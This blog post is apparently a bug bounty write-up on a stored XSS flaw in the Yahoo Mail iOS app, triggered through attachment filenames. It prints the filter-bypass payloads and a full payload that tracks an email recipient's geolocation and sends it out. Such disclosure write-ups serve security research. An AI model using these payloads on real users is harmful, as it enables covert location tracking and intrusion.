Stored XSS in Yahoo mail IOS app($3500)

I want to share about my easy finding in Yahoo mail IOS application, easy but worth $3500.

Last 3 months ago, i found Stored XSS in Microsoft outlook mail IOS app. You can read  there. So, I think “what if yahoo is vulnerable to this kind of attack? “, then i start testing on yahoo mail app. Using the same payload, the same filename with

"><img src=x onerror=alert(1)>.jpg

But, yahoo mail app didn’t pop-up, so i start digging around and change payload name to “><plaintext>. Then, finally i know there has some restrictions so i didn’t see an alert.

All complex payload didn’t find a right solution and pentesting on IOS mail app is harder than web application. After searching around 1 hours, i found the right solution. With  “><img src=x onerror=”a=alert;a(1);”.jpg can bypass this restriction.

Then i knew, the right solution. I need to pop-up something useful but in IOS app, you can’t use document.domain, document.cookies, so i used

'"><img src="x" onerror="v=prompt;navigator.geolocation.watchPosition(function(loc){m='Location latitiude'+loc.coords.latitude+'long titue'+loc.coords.longitude;v(m);b=document.createElement('img');b.src='http/'+m;})">

payload to steal victims location. After uploading this payload and sent to victims email. If victims open this email. I will exactly knows his geolocation.

Screen Shot 2018-02-08 at 12.58.33 PM

I reported to Yahoo, and Yahoo gave me an initial reward $300 and final payout is $3200. So, total $3500. Easy money right? 😀

Thats all, sometimes you don’t need a lots of recon and skills. If you can find a right path and a right solution, you can get some money.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s